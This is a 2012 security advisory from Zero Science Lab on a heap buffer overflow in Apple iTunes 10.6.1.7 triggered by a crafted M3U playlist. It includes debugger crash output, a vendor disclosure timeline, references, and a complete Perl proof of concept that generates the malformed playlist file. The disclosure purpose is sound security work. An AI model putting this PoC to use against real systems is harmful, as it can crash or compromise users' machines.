Lucene search
Gjoko KrsticZSL-2012-5093HistoryJun 12, 2012 - 12:00 a.m.
Apple iTunes 10.6.1.7 M3U Playlist File Walking Heap Buffer Overflow
2012-06-1200:00:00
Gjoko Krstic
zeroscience.mk
14
7.1 High
AI Score
Confidence
High
Title: Apple iTunes 10.6.1.7 M3U Playlist File Walking Heap Buffer Overflow
Advisory ID: ZSL-2012-5093
Type: Local/Remote
Impact: System Access, DoS
Risk: (4/5)
Release Date: 12.06.2012
Summary
iTunes is a free application for your Mac or PC. It lets you organize and play digital music and video on your computer. It can automatically download new music, app, and book purchases across all your devices and computers. And itβs a store that has everything you need to be entertained. Anywhere. Anytime.
Description
The vulnerability is caused due to a boundary error in the processing of a playlist file, which can be exploited to cause a heap based buffer overflow when a user opens e.g. a specially crafted .M3U file. Successful exploitation could allow execution of arbitrary code on the affected node.
--------------------------------------------------------------------------------
` (940.fc0): Access violation - code c0000005 (!!! second chance !!!)
eax=41414141 ebx=08508cd8 ecx=41414141 edx=052a6528 esi=052a64b0 edi=0559ef20
eip=41414141 esp=0012d8e8 ebp=7c90ff2d iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
+0x41414130:
41414141 ?? ???
(6b0.a04): Access violation - code c0000005 (!!! second chance !!!)
eax=41414141 ebx=00000000 ecx=00000014 edx=41414141 esi=41414141 edi=0187e10d
eip=0187deec esp=0b0cfcd0 ebp=0b0cfcf0 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
Defaulted to export symbols for C:\Program Files\Common Files\Apple\Apple Application Support\CoreFoundation.dll -
CoreFoundation!CFWriteStreamCreateWithAllocatedBuffers+0x40:
0187deec 8b00 mov eax,dword ptr [eax] ds:0023:41414141=????????
`
\--------------------------------------------------------------------------------
##### Vendor
Apple Inc. - <http://www.apple.com>
##### Affected Version
10.6.1.7 and 10.6.0.40
##### Tested On
Microsoft Windows XP Professional SP3 EN (32bit)
Microsoft Windows 7 Ultimate SP1 EN (64bit)
##### Vendor Status
[13.03.2012] Vulnerability discovered in version 10.6.0.40.
[29.03.2012] Vulnerability present in version 10.6.1.7.
[11.05.2012] Vendor contacted.
[11.05.2012] Vendor responds asking more details.
[11.05.2012] Sent detailed information and PoC code to the vendor.
[12.05.2012] Vendor begins investigation.
[14.05.2012] Asked vendor for confirmation.
[17.05.2012] Vendor confirms the vulnerability, developing patch.
[17.05.2012] Requested a scheduled patch release date from vendor.
[18.05.2012] Vendor replies.
[06.06.2012] Asked vendor for status update.
[08.06.2012] Vendor shares information about security update.
[11.06.2012] Vendor releases version 10.6.3 to address this issue.
[12.06.2012] Coordinated public security advisory released.
##### PoC
[itunes_bof.pl](<../../codes/itunes_bof.txt>)
##### Credits
Vulnerability discovered by Gjoko Krstic - <[[email protected]](<mailto:[email protected]>)>
##### References
[1] <http://support.apple.com/kb/HT5318>
[2] <http://support.apple.com/kb/HT1222>
[3] <http://www.apple.com/itunes/download>
[4] <http://cve.mitre.org/cgi-bin/cvename.cgi?name=2012-0677>
[5] <https://isc.sans.edu/diary/Apple+iTunes+Security+Update/13435>
[6] <http://secunia.com/advisories/49489>
[7] <http://cxsecurity.com/issue/WLB-2012060148>
[8] <http://www.exploit-db.com/exploits/19098/>
[9] <http://packetstormsecurity.org/files/113555>
[10] <http://packetstormsecurity.org/files/113566>
[11] <http://www.securelist.com/en/advisories/49489>
[12] <http://www.securitytracker.com/id/1027142>
[13] <http://osvdb.org/show/osvdb/82897>
[14] <http://www.scmagazine.com.au/News/304973,booby-trapped-playlist-pwns-itunes.aspx>
[15] <http://www.crn.com.au/News/304998,booby-trapped-playlist-hits-itunes.aspx>
[16] <http://lists.virus.org/apple-security-1206/msg00000.html>
[17] <http://www.camcert.gov.kh/?p=1201>
[18] <http://securityvulns.com/docs28127.html>
[19] <http://www.net-security.org/advisory.php?id=14441>
[20] <http://archives.neohapsis.com/archives/bugtraq/2012-06/0051.html>
[21] <http://www.nsfocus.net/vulndb/19773>
[22] <https://www.cert.be/pro/node/12532>
[23] <http://sylvar.tumblr.com/post/25087980360/apple-itunes-10-6-1-7-m3u-playlist-file-walking>
[24] <http://www.securityfocus.com/bid/53933>
[25] [http://www.nessus.org/plugins/index.php?view=single&id=59497](<http://www.nessus.org/plugins/index.php?view=single&id=59497>)
[26] [http://www.nessus.org/plugins/index.php?view=single&id=59498](<http://www.nessus.org/plugins/index.php?view=single&id=59498>)
[27] [http://www.nessus.org/plugins/index.php?view=single&id=59499](<http://www.nessus.org/plugins/index.php?view=single&id=59499>)
[28] <http://www.scmagazine.com/itunes-vulnerability-may-enable-remote-code-execution/article/246207/>
[29] <http://www.informationweek.com/aroundtheweb/security/itunes-vulnerability-may-enable-remote-c/704d55486d51544d524931735147714b49364f5558773d3d>
[30] <http://www.msnbc.msn.com/id/47876553/ns/technology_and_science-security/#.T-H7rbVo3-s>
[31] <http://www.libertas.mk/vest/28065/Makedonski-IT-ekspert-otkri-opasen-bezbednosen-defekt-vo-iTjuns>
[32] <http://www.scip.ch/en/?vuldb.5552>
[33] <http://www.infosecurity-magazine.com/view/26492/researcher-publishes-proofofconcept-exploit-for-itunes/>
[34] <http://www.intego.com/mac-security-blog/time-to-update-itunes/>
[35] <http://tif.mcafee.com/threats/3500>
##### Changelog
[12.06.2012] - Initial release
[13.06.2012] - Added reference [7], [8], [9], [10], [11], [12] and [13]
[17.06.2012] - Added reference [14], [15], [16], [17], [18], [19], [20], [21], [22], [23], [24], [25], [26] and [27]
[20.06.2012] - Added reference [28], [29], [30] and [31]
[21.06.2012] - Added reference [32]
[24.06.2012] - Added reference [33] and [34]
[01.06.2015] - Added reference [35]
##### Contact
Zero Science Lab
Web: <http://www.zeroscience.mk>
e-mail: [[email protected]](<mailto:[email protected]>)
<html><body><p>#!/usr/bin/perl
#
#
# Apple iTunes 10.6.1.7 M3U Playlist File Walking Heap Buffer Overflow
#
#
# Vendor: Apple Inc.
# Product web page: http://www.apple.com
# Affected version: 10.6.1.7 and 10.6.0.40
#
# Summary: iTunes is a free application for your Mac or PC. It lets you
# organize and play digital music and video on your computer. It can
# automatically download new music, app, and book purchases across all
# your devices and computers. And itοΏ½s a store that has everything you
# need to be entertained. Anywhere. Anytime.
#
# Desc: The vulnerability is caused due to a boundary error in the processing
# of a playlist file, which can be exploited to cause a heap based buffer
# overflow when a user opens e.g. a specially crafted .M3U file. Successful
# exploitation could allow execution of arbitrary code on the affected node.
#
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# (940.fc0): Access violation - code c0000005 (!!! second chance !!!)
# eax=41414141 ebx=08508cd8 ecx=41414141 edx=052a6528 esi=052a64b0 edi=0559ef20
# eip=41414141 esp=0012d8e8 ebp=7c90ff2d iopl=0 nv up ei pl nz na pe nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
# <unloaded_card.dll>+0x41414130:
# 41414141 ?? ???
#
# ~~~
#
# (6b0.a04): Access violation - code c0000005 (!!! second chance !!!)
# eax=41414141 ebx=00000000 ecx=00000014 edx=41414141 esi=41414141 edi=0187e10d
# eip=0187deec esp=0b0cfcd0 ebp=0b0cfcf0 iopl=0 nv up ei pl nz na pe nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
# Defaulted to export symbols for C:\Program Files\Common Files\Apple\Apple Application Support\CoreFoundation.dll -
# CoreFoundation!CFWriteStreamCreateWithAllocatedBuffers+0x40:
# 0187deec 8b00 mov eax,dword ptr [eax] ds:0023:41414141=????????
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
#
# Tested on: Microsoft Windows XP Professional SP3 EN (32bit)
# Microsoft Windows 7 Ultimate SP1 EN (64bit)
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# Zero Science Lab - http://www.zeroscience.mk
#
#
# Vendor status:
#
# [13.03.2012] Vulnerability discovered in version 10.6.0.40.
# [29.03.2012] Vulnerability present in version 10.6.1.7.
# [11.05.2012] Vendor contacted.
# [11.05.2012] Vendor responds asking more details.
# [11.05.2012] Sent detailed information and PoC code to the vendor.
# [12.05.2012] Vendor begins investigation.
# [14.05.2012] Asked vendor for confirmation.
# [17.05.2012] Vendor confirms the vulnerability, developing patch.
# [17.05.2012] Requested a scheduled patch release date from vendor.
# [18.05.2012] Vendor replies.
# [06.06.2012] Asked vendor for status update.
# [08.06.2012] Vendor shares information about security update.
# [11.06.2012] Vendor releases version 10.6.3 to address this issue.
# [12.06.2012] Coordinated public security advisory released.
#
#
# Advisory ID: ZSL-2012-5093
# Advisory URL: http://zeroscience.mk/en/vulnerabilities/ZSL-2012-5093.php
# Advisory TXT: http://www.zeroscience.mk/codes/itunes_bof.txt
#
# Apple ID: APPLE-SA-2012-06-11-1
# Apple Advisory #1: http://support.apple.com/kb/HT5318
# Apple Advisory #2: http://support.apple.com/kb/HT1222
#
# CVE ID: CVE-2012-0677
# CVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=2012-0677
#
#
# 13.03.2012
#
use strict;
my $FILE = "HIEROGLYPH.m3u";
my $AN = "\x44\x44\x44\x44";
my $EGYPTIAN = "\x43" x 16560;
my $LIKE = "\x42\x42\x42\x42";
#######
#OOOOOOOOOOY
my $WALK="\x23\x45". "\x58\x54\x4D\x33".
"\x55\x0D\x41\x41\x41". "\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41". "\x41\x41".
"\x41\x41\x41\x41". "\x41". "\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41". "\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41".
"\x41\x41\x41\x41\x41\x41". "\x41". "\x41\x41".
"\x41\x41\x41". "\x41". "\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41". "\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41". "\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41". "\x41\x41\x41\x41\x41\x41".
"\x41\x41". "\x41\x41\x41\x41\x41\x41".
"\x41\x41". "\x41\x41\x41\x41\x41".
"\x41\x41". "\x41\x41\x41\x41\x41".
"\x41\x41". "\x41\x41\x41\x41\x41".
"\x41\x41". "\x41\x41\x41\x41".
"\x41\x41\x41". "\x41\x41\x41\x41".
"\x41\x41\x41\x41". "\x41\x41\x41\x41".
"\x41\x41\x41".
"\x41\x41\x41".
"\x41\x41\x41".
"\x41\x41\x41\x41".
"\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41". "\x41\x41\x41".
"\x41\x41\x41\x41\x41". "\x41\x41\x41".
"\x41\x41\x41". "\x41\x41\x41".
"\x41\x41\x41". "\x41\x41\x41".
"\x41\x41\x41". "\x41\x41\x41".
"\x41\x41\x41". "\x41\x41\x41".
"\x41\x41". "\x41\x41".
"\x41\x41". "\x41\x41".
"\x41\x41". "\x41\x41".
"\x41\x41". "\x41\x41".
"\x41\x41". "\x41\x41".
"\x41\x41". "\x41\x41".
"\x41\x41". "\x41\x41".
"\x41\x41". "\x41\x41".
"\x41\x41". "\x41\x41".
"\x41\x41". "\x41\x41".
"\x41\x41". "\x41\x41".
"\x41\x41". "\x41\x41".
"\x41\x41". "\x41\x41".
"\x41\x41". "\x41\x41".
"\x41\x41". "\x41\x41".
"\x41\x41\x41". "\x41\x41\x41".
"\x41\x41\x41\x41". "\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41". "\x41\x41".
"\x41\x41". "\x41\x41".
"\x41\x41". "\x41\x41".
"\x41\x41". "\x41\x41".
"\x41\x41". "\x41\x41".
"\x41\x41". "\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41" x 7691;
my $CRYPT = $WALK.$LIKE.$AN.$EGYPTIAN;
print "\n\n[+] Creating $FILE file...\n";
open ZSL, ">./$FILE" || die "\n[-] Can't open $FILE: $!\n\n";
print ZSL $CRYPT;
print "\n[+] File successfully composed!\n\n";
close ZSL;
</unloaded_card.dll></p></body></html>Related
nessus
nessus
iTunes < 10.6.3 m3u Multiple Buffer Overflow Vulnerabilities (Mac OS X)
2012-06-14 00:00:00
iTunes < 10.6.3 Multiple Vulnerabilities
2012-06-19 00:00:00
Apple iTunes < 10.6.3 Multiple Vulnerabilities (credentialed check)
2012-06-14 00:00:00
saint
saint
iTunes m3u Playlist Overflow
2012-07-03 00:00:00
iTunes m3u Playlist Overflow
2012-07-03 00:00:00
iTunes m3u Playlist Overflow
2012-07-03 00:00:00
canvas
canvas
Immunity Canvas: ITUNES_10_6_1
2012-06-12 14:55:00
seebug
seebug
Apple iTunes 10.6.1.7 M3U Playlist File Walking Heap Buffer Overflow
2014-07-01 00:00:00
Apple iTunes <= 10.6.1.7 Extended m3u Stack Buffer Overflow
2014-07-01 00:00:00
Apple iTunesζ§θ‘δ»»ζ代η εζη»ζε‘ζΌζ΄
2012-06-13 00:00:00
prion
prion
Heap overflow
2012-06-12 14:55:00
packetstorm
packetstorm
Apple iTunes 10.6.1.7 M3U Playlist Buffer Overflow
2012-06-12 00:00:00
iTunes Extended M3U Stack Buffer Overflow
2012-06-21 00:00:00
exploitpack
exploitpack
Apple iTunes 10.6.1.7 - Extended m3u Stack Buffer Overflow (Metasploit)
2012-06-21 00:00:00
Apple iTunes 10.6.1.7 - .m3u Walking Heap Buffer Overflow (PoC)
2012-06-13 00:00:00
cvelist
cvelist
CVE-2012-0677
2012-06-12 14:00:00
openvas
openvas
Apple iTunes '.m3u' Playlist Code Execution Vulnerabilities (Windows)
2012-06-12 00:00:00
Apple iTunes '.m3u' Playlist Code Execution Vulnerability (Mac OS X)
2012-06-12 00:00:00
Apple iTunes '.m3u' Playlist Code Execution Vulnerabilities - Windows
2012-06-12 00:00:00
exploitdb
exploitdb
Apple iTunes 10.6.1.7 - Extended m3u Stack Buffer Overflow (Metasploit)
2012-06-21 00:00:00
Apple iTunes 10.6.1.7 - '.m3u' Walking Heap Buffer Overflow (PoC)
2012-06-13 00:00:00
cve
cve
CVE-2012-0677
2012-06-12 14:55:00
checkpoint_advisories
checkpoint_advisories
Apple iTunes m3u Playlist Multiple Buffer Overflows (CVE-2012-0677)
2012-09-04 00:00:00
securityvulns
securityvulns
APPLE-SA-2012-06-11-1 iTunes 10.6.3
2012-06-12 00:00:00
Apple iTunes security vulnerabilities
2012-06-12 00:00:00